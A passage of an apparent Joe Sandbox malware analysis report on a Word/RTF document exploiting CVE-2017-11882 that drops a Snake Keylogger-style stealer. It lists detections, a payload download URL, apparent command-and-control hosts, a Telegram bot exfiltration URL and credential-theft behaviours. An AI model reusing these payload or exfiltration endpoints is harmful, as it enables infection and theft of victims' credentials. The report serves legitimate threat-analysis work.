2 18->21         started        25 powershell.exe 4 18->25         started        process11 dnsIp12 33 reallyfreegeoip.org 21->33 35 api.telegram.org 21->35 37 8 other IPs or domains 21->37 55 Installs new ROOT certificates 21->55 57 Tries to steal Mail credentials (via file / registry access) 21->57 59 Tries to harvest and steal browser information (history, passwords, etc) 21->59 signatures13 61 Tries to detect the country of the analysis system (by using the IP) 33->61 63 Uses the Telegram API (likely for C&C communication) 35->63

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PO.doc50%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                PO.doc100%AviraHEUR/Rtf.Malformed

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\6FfzLi8FyhIIqWu[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\obisfd.exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://crl.entrust.net/server1.crl00%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                http://varders.kozow.com:80810%URL Reputationsafe
                http://aborters.duckdns.org:8081100%URL Reputationmalware
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                http://anotherarmy.dns.army:8081100%URL Reputationmalware
                http://checkip.dyndns.org/q0%URL Reputationsafe
                http://reallyfreegeoip.org0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://checkip.dyndns.com0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://secure.comodo.com/CPS00%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		188.114.96.3
                		truetrue
                  		unknown
                  api.telegram.org
                  		149.154.167.220
                  		truetrue
                    		unknown
                    checkip.dyndns.com
                    		158.101.44.242
                    		truefalse
                      		unknown
                      checkip.dyndns.org
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2010/7/2024%20/%2011:37:00%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • URL Reputation: safe
                          		unknown
                          http://154.216.19.160/txt/6FfzLi8FyhIIqWu.exetrue
                            		unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabobisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://154.216.19.160/txt/6FfzLi8FyhIIqWu.exejEQNEDT32.EXE, 00000002.00000002.397637969.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://duckduckgo.com/ac/?q=obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmfobisfd.exe, 00000007.00000002.924283093.00000000038B8000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://api.telegram.orgobisfd.exe, 00000007.00000002.923787570.0000000002969000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://crl.entrust.net/server1.crl0obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.org/botobisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002969000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&iobisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://ocsp.entrust.net03obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://154.216.19.160/txt/6FfzLi8FyhIIqWu.exettC:EQNEDT32.EXE, 00000002.00000002.397637969.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.diginotar.nl/cps/pkioverheid0obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://checkip.dyndns.orgobisfd.exe, 00000007.00000002.923787570.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002848000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000293B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000295B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002897000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000291F000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002904000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000294D000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002854000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchobisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=obisfd.exe, 00000007.00000002.923787570.0000000002969000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://reallyfreegeoip.org/xml/8.46.123.334obisfd.exe, 00000007.00000002.923787570.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000293B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000295B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002897000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002904000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000294D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://varders.kozow.com:8081obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.google.com/favicon.icoobisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://154.216.19.160/txt/6FfzLi8FyhIIqWu.exeC:EQNEDT32.EXE, 00000002.00000003.397395369.000000000067F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.397698167.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://aborters.duckdns.org:8081obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • URL Reputation: malware
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.google.com/sorry/indexobisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.google.com/search?q=wmfobisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://anotherarmy.dns.army:8081obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • URL Reputation: malware
                                                          		unknown
                                                          http://checkip.dyndns.org/qobisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://reallyfreegeoip.orgobisfd.exe, 00000007.00000002.923787570.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000286D000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000293B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000295B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002904000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000294D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://reallyfreegeoip.orgobisfd.exe, 00000007.00000002.923787570.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000293B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000295B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002897000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002904000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000294D000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002854000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26aobisfd.exe, 00000007.00000002.924283093.00000000038B8000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://www.google.com/search?q=netobisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://www.google.com/sorry/indextestobisfd.exe, 00000007.00000002.924283093.000000000398E000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.000000000396C000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003912000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.00000000038B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://checkip.dyndns.comobisfd.exe, 00000007.00000002.923787570.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000293B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000295B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002904000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000294D000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002854000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://api.telegram.orgobisfd.exe, 00000007.00000002.923787570.0000000002969000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://ocsp.entrust.net0Dobisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameobisfd.exe, 00000005.00000002.405641399.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://secure.comodo.com/CPS0obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://crl.entrust.net/2048ca.crl0obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20aobisfd.exe, 00000007.00000002.923787570.0000000002969000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedobisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://reallyfreegeoip.org/xml/obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002854000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      132.226.8.169
                                                                      		unknownUnited States
                                                                      		16989UTMEMUSfalse
                                                                      149.154.167.220
                                                                      		api.telegram.orgUnited Kingdom
                                                                      		62041TELEGRAMRUtrue
                                                                      188.114.97.3
                                                                      		unknownEuropean Union
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      193.122.6.168
                                                                      		unknownUnited States
                                                                      		31898ORACLE-BMC-31898USfalse
                                                                      188.114.96.3
                                                                      		reallyfreegeoip.orgEuropean Union
                                                                      		13335CLOUDFLARENETUStrue
                                                                      193.122.130.0
                                                                      		unknownUnited States
                                                                      		31898ORACLE-BMC-31898USfalse
                                                                      158.101.44.242
                                                                      		checkip.dyndns.comUnited States
                                                                      		31898ORACLE-BMC-31898USfalse
                                                                      154.216.19.160
                                                                      		unknownSeychelles
                                                                      		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1528051
                                                                      Start date and time:2024-10-07 14:54:39 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 8s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                      Number of analysed new started processes analysed:13
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:PO.doc
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.expl.evad.winDOC@9/14@29/8
                                                                      EGA Information:
                                                                      • Successful, ratio: 66.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 95%
                                                                      • Number of executed functions: 73
                                                                      • Number of non-executed functions: 124
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .doc
                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                      • Attach to Office via COM
                                                                      • Active ActiveX Object
                                                                      • Scroll down
                                                                      • Close Viewer
                                                                      • Override analysis time to 79059.1454712477 for current running targets taking high CPU consumption
                                                                      • Override analysis time to 158118.290942495 for current running targets taking high CPU consumption

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 3372 because there are no executed function
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: PO.doc

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      08:55:47API Interceptor305x Sleep call for process: EQNEDT32.EXE modified
                                                                      08:55:51API Interceptor9090109x Sleep call for process: obisfd.exe modified
                                                                      08:55:53API Interceptor21x Sleep call for process: powershell.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      132.226.8.1698038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      Confirmation transfer AGS # 03-10-24.scr.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      StatementXofXaccount.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      Updated New Order.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      149.154.167.220TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                          SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                              COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          188.114.97.3Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.cc101.pro/0r21/
                                                                                          http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                                                                          • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                                                                          QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • filetransfer.io/data-package/eZFzMENr/download
                                                                                          QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • filetransfer.io/data-package/MlZtCPkK/download
                                                                                          https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                                                          • mairie-espondeilhan.com/
                                                                                          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • filetransfer.io/data-package/758bYd86/download
                                                                                          QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • filetransfer.io/data-package/58PSl7si/download
                                                                                          QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                          • filetransfer.io/data-package/58PSl7si/download
                                                                                          payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.cc101.pro/0r21/
                                                                                          BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                          • cloud.dellicon.top/1000/500/

                                                                                          Domains

